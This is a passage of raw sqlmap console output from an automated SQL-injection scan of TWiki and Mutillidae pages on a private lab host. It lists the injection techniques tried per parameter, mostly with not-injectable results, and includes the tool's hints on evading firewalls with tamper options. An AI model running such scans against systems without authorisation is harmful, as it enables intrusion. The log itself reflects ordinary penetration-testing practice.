[18:19:03] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:19:03] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:19:03] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:19:03] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:19:03] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:19:03] [INFO] testing 'MySQL inline queries'
[18:19:03] [INFO] testing 'PostgreSQL inline queries'
[18:19:03] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:19:03] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:19:03] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:19:03] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:19:03] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:19:03] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:19:04] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:19:04] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:19:04] [INFO] testing 'Oracle AND time-based blind'
[18:19:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:19:04] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:19:05] [WARNING] GET parameter 'rev2' is not injectable
[18:19:05] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[18:19:05] [WARNING] HTTP error codes detected during run:
400 (Bad Request) - 469 times
URL 7:
GET http://192.168.1.113:80/../view/TWiki/TWikiHistory?rev=1.9
do you want to test this URL? [Y/n/q]
> Y
[18:19:05] [INFO] testing URL 'http://192.168.1.113:80/../view/TWiki/TWikiHistory?rev=1.9'
[18:19:05] [INFO] testing connection to the target URL
[18:19:05] [WARNING] the web server responded with an HTTP error code (400) which could interfere with the results of the tests
[18:19:05] [INFO] testing if the target URL is stable
[18:19:06] [INFO] target URL is stable
[18:19:06] [INFO] testing if GET parameter 'rev' is dynamic
[18:19:06] [WARNING] GET parameter 'rev' does not appear dynamic
[18:19:06] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable
[18:19:06] [INFO] testing for SQL injection on GET parameter 'rev'
[18:19:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:19:06] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:19:06] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:19:06] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:19:06] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:19:06] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:19:06] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:19:06] [INFO] testing 'MySQL inline queries'
[18:19:06] [INFO] testing 'PostgreSQL inline queries'
[18:19:06] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:19:06] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:19:06] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:19:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:19:06] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:19:06] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:19:06] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:19:06] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:19:06] [INFO] testing 'Oracle AND time-based blind'
[18:19:06] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:19:06] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:19:07] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:19:07] [WARNING] GET parameter 'rev' is not injectable
[18:19:07] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[18:19:07] [WARNING] HTTP error codes detected during run:
400 (Bad Request) - 236 times
[18:19:07] [INFO] skipping 'http://192.168.1.113:80/../rdiff/TWiki/TWikiHistory?rev1=1.9&rev2=1.8'
[18:19:07] [INFO] skipping 'http://192.168.1.113:80/../view/TWiki/TWikiHistory?rev=1.8'
[18:19:07] [INFO] skipping 'http://192.168.1.113:80/../rdiff/TWiki/TWikiHistory?rev1=1.8&rev2=1.7'
[18:19:07] [INFO] skipping 'http://192.168.1.113:80/../view/TWiki/TWikiHistory?rev=1.7'
URL 8:
GET http://192.168.1.113:80/../oops/TWiki/TWikiHistory?template=oopsrev&param1=1.10
do you want to test this URL? [Y/n/q]
> Y
[18:19:07] [INFO] testing URL 'http://192.168.1.113:80/../oops/TWiki/TWikiHistory?template=oopsrev&param1=1.10'
[18:19:07] [INFO] testing connection to the target URL
[18:19:07] [WARNING] the web server responded with an HTTP error code (400) which could interfere with the results of the tests
[18:19:07] [INFO] testing if the target URL is stable
[18:19:08] [INFO] target URL is stable
[18:19:08] [INFO] testing if GET parameter 'template' is dynamic
[18:19:08] [WARNING] GET parameter 'template' does not appear dynamic
[18:19:08] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable
[18:19:08] [INFO] testing for SQL injection on GET parameter 'template'
[18:19:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:19:08] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:19:08] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:19:08] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:19:08] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:19:08] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:19:08] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:19:09] [INFO] testing 'MySQL inline queries'
[18:19:09] [INFO] testing 'PostgreSQL inline queries'
[18:19:09] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:19:09] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:19:09] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:19:09] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:19:09] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:19:09] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:19:09] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:19:09] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:19:09] [INFO] testing 'Oracle AND time-based blind'
[18:19:09] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:19:09] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:19:09] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:19:10] [WARNING] GET parameter 'template' is not injectable
[18:19:10] [INFO] testing if GET parameter 'param1' is dynamic
[18:19:10] [WARNING] GET parameter 'param1' does not appear dynamic
[18:19:10] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable
[18:19:10] [INFO] testing for SQL injection on GET parameter 'param1'
[18:19:10] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:19:10] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:19:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:19:10] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:19:10] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:19:10] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:19:10] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:19:10] [INFO] testing 'MySQL inline queries'
[18:19:10] [INFO] testing 'PostgreSQL inline queries'
[18:19:10] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:19:10] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:19:10] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:19:10] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:19:10] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:19:10] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:19:10] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:19:10] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:19:10] [INFO] testing 'Oracle AND time-based blind'
[18:19:11] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:19:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:19:11] [WARNING] GET parameter 'param1' is not injectable
[18:19:11] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[18:19:11] [WARNING] HTTP error codes detected during run:
400 (Bad Request) - 469 times
[18:19:11] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=add-to-your-blog.php'
[18:19:11] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=add-to-your-blog.php'
[18:19:11] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=site-footer-xss-discussion.php'
[18:19:11] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=site-footer-xss-discussion.php'
[18:19:11] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=php-errors.php'
[18:19:11] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=php-errors.php'
[18:19:11] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-hints&page=browser-info.php'
[18:19:11] [INFO] skipping 'http://192.168.1.113:80/mutillidae/index.php?do=toggle-security&page=browser-info.php'
URL 9:
GET http://192.168.1.113:80/twiki/bin/edit/Main/WebHome?t=1441456557
do you want to test this URL? [Y/n/q]
> Y
[18:19:11] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/Main/WebHome?t=1441456557'
[18:19:11] [INFO] testing connection to the target URL
[18:19:12] [INFO] testing if the target URL is stable
[18:19:13] [INFO] target URL is stable
[18:19:13] [INFO] testing if GET parameter 't' is dynamic
[18:19:13] [WARNING] GET parameter 't' does not appear dynamic
[18:19:13] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable
[18:19:13] [INFO] testing for SQL injection on GET parameter 't'
[18:19:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:19:14] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:19:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:19:15] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:19:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:19:16] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:19:17] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:19:17] [INFO] testing 'MySQL inline queries'
[18:19:17] [INFO] testing 'PostgreSQL inline queries'
[18:19:17] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:19:17] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:19:18] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:19:18] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:19:19] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:19:19] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:19:20] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:19:20] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:19:21] [INFO] testing 'Oracle AND time-based blind'
[18:19:21] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:19:21] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:19:28] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:19:34] [WARNING] GET parameter 't' is not injectable
[18:19:34] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 10:
GET http://192.168.1.113:80/twiki/bin/search/Main/SearchResult?scope=text&regex=on&search=Web *Home[^A-Za-z]
do you want to test this URL? [Y/n/q]
> Y
[18:19:34] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/Main/SearchResult?scope=text&regex=on&search=Web *Home[^A-Za-z]'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y
[18:19:34] [INFO] testing connection to the target URL
[18:19:34] [INFO] testing if the target URL is stable
[18:19:35] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[18:19:35] [INFO] testing if URI parameter '#1*' is dynamic
[18:19:35] [WARNING] URI parameter '#1*' does not appear dynamic
[18:19:35] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable
[18:19:35] [INFO] testing for SQL injection on URI parameter '#1*'
[18:19:35] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:19:36] [WARNING] reflective value(s) found and filtering out
[18:19:37] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:19:37] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:19:37] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:19:38] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:19:38] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:19:39] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:19:39] [INFO] testing 'MySQL inline queries'
[18:19:39] [INFO] testing 'PostgreSQL inline queries'
[18:19:39] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:19:39] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:19:40] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:19:40] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:19:41] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:19:41] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:19:42] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:19:42] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:19:43] [INFO] testing 'Oracle AND time-based blind'
[18:19:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:19:43] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:19:50] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:19:56] [WARNING] URI parameter '#1*' is not injectable
[18:19:56] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 11:
GET http://192.168.1.113:80/twiki/bin/view/Main/WebHome?skin=print
do you want to test this URL? [Y/n/q]
> Y
[18:19:56] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Main/WebHome?skin=print'
[18:19:56] [INFO] testing connection to the target URL
[18:19:56] [INFO] testing if the target URL is stable
[18:19:57] [INFO] target URL is stable
[18:19:57] [INFO] testing if GET parameter 'skin' is dynamic
[18:19:57] [INFO] confirming that GET parameter 'skin' is dynamic
[18:19:57] [INFO] GET parameter 'skin' is dynamic
[18:19:57] [INFO] heuristics detected web page charset 'ascii'
[18:19:57] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable
[18:19:58] [INFO] testing for SQL injection on GET parameter 'skin'
[18:19:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:19:58] [WARNING] reflective value(s) found and filtering out
[18:19:59] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:19:59] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:20:00] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:20:01] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:20:02] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:20:02] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:20:02] [INFO] testing 'MySQL inline queries'
[18:20:03] [INFO] testing 'PostgreSQL inline queries'
[18:20:03] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:20:03] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:20:03] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:20:04] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:20:05] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:20:05] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:20:06] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:20:07] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:20:07] [INFO] testing 'Oracle AND time-based blind'
[18:20:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:20:08] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:20:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:20:24] [WARNING] GET parameter 'skin' is not injectable
[18:20:24] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 12:
GET http://192.168.1.113:80/twiki/bin/rdiff/Main/WebHome?rev1=1.21&rev2=1.20
do you want to test this URL? [Y/n/q]
> Y
[18:20:24] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/Main/WebHome?rev1=1.21&rev2=1.20'
[18:20:24] [INFO] testing connection to the target URL
[18:20:24] [INFO] testing if the target URL is stable
[18:20:25] [INFO] target URL is stable
[18:20:25] [INFO] testing if GET parameter 'rev1' is dynamic
[18:20:25] [WARNING] GET parameter 'rev1' does not appear dynamic
[18:20:25] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable
[18:20:26] [INFO] testing for SQL injection on GET parameter 'rev1'
[18:20:26] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:20:27] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:20:27] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:20:27] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:20:28] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:20:28] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:20:29] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:20:29] [INFO] testing 'MySQL inline queries'
[18:20:29] [INFO] testing 'PostgreSQL inline queries'
[18:20:29] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:20:29] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:20:30] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:20:30] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:20:31] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:20:31] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:20:32] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:20:32] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:20:33] [INFO] testing 'Oracle AND time-based blind'
[18:20:33] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:20:33] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:20:40] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:20:46] [WARNING] GET parameter 'rev1' is not injectable
[18:20:46] [INFO] testing if GET parameter 'rev2' is dynamic
[18:20:47] [WARNING] GET parameter 'rev2' does not appear dynamic
[18:20:47] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable
[18:20:47] [INFO] testing for SQL injection on GET parameter 'rev2'
[18:20:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:20:48] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:20:49] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:20:50] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:20:50] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:20:51] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:20:51] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:20:52] [INFO] testing 'MySQL inline queries'
[18:20:53] [INFO] testing 'PostgreSQL inline queries'
[18:20:53] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:20:54] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:20:54] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:20:55] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:20:55] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:20:56] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:20:56] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:20:57] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:20:57] [INFO] testing 'Oracle AND time-based blind'
[18:20:58] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:21:05] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:21:11] [WARNING] GET parameter 'rev2' is not injectable
[18:21:11] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
URL 13:
GET http://192.168.1.113:80/twiki/bin/view/Main/WebHome?rev=1.20
do you want to test this URL? [Y/n/q]
> Y
[18:21:11] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/Main/WebHome?rev=1.20'
[18:21:11] [INFO] testing connection to the target URL
[18:21:12] [INFO] testing if the target URL is stable
[18:21:12] [INFO] target URL is stable
[18:21:12] [INFO] testing if GET parameter 'rev' is dynamic
[18:21:12] [WARNING] GET parameter 'rev' does not appear dynamic
[18:21:13] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable
[18:21:13] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks
[18:21:13] [INFO] testing for SQL injection on GET parameter 'rev'
[18:21:13] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:21:13] [WARNING] reflective value(s) found and filtering out
[18:21:14] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:21:15] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:21:15] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:21:16] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:21:16] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:21:17] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
[18:21:17] [INFO] testing 'MySQL inline queries'
[18:21:17] [INFO] testing 'PostgreSQL inline queries'
[18:21:17] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[18:21:17] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)'
[18:21:18] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[18:21:18] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[18:21:19] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[18:21:19] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[18:21:20] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[18:21:20] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[18:21:21] [INFO] testing 'Oracle AND time-based blind'
[18:21:22] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[18:21:22] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms'
[18:21:29] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[18:21:38] [WARNING] GET parameter 'rev' is not injectable
[18:21:38] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL
[18:21:38] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/Main/WebHome?rev1=1.20&rev2=1.19'
[18:21:38] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/Main/WebHome?rev=1.19'
URL 14:
GET http://192.168.1.113:80/twiki/bin/oops/Main/WebHome?template=oopsmore&param1=1.21&param2=1.21
do you want to test this URL? [Y/n/q]
> Y
[18:21:38] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/Main/WebHome?template=oopsmore&param1=1.21&param2=1.21'
[18:21:38] [INFO] testing connection to the target URL
[18:21:38] [INFO] testing if the target URL is stable
[18:21:39] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
[18:21:39] [INFO] testing if GET parameter 'template' is dynamic
[18:21:39] [INFO] confirming that GET parameter 'template' is dynamic
[18:21:39] [INFO] GET parameter 'template' is dynamic
[18:21:39] [INFO] heuristics detected web page charset 'ascii'
[18:21:39] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable
[18:21:39] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks
[18:21:39] [INFO] testing for SQL injection on GET parameter 'template'
[18:21:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[18:21:39] [WARNING] reflective value(s) found and filtering out
[18:21:40] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace'
[18:21:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause'
[18:21:41] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[18:21:41] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[18:21:42] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[18:21:42] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace'
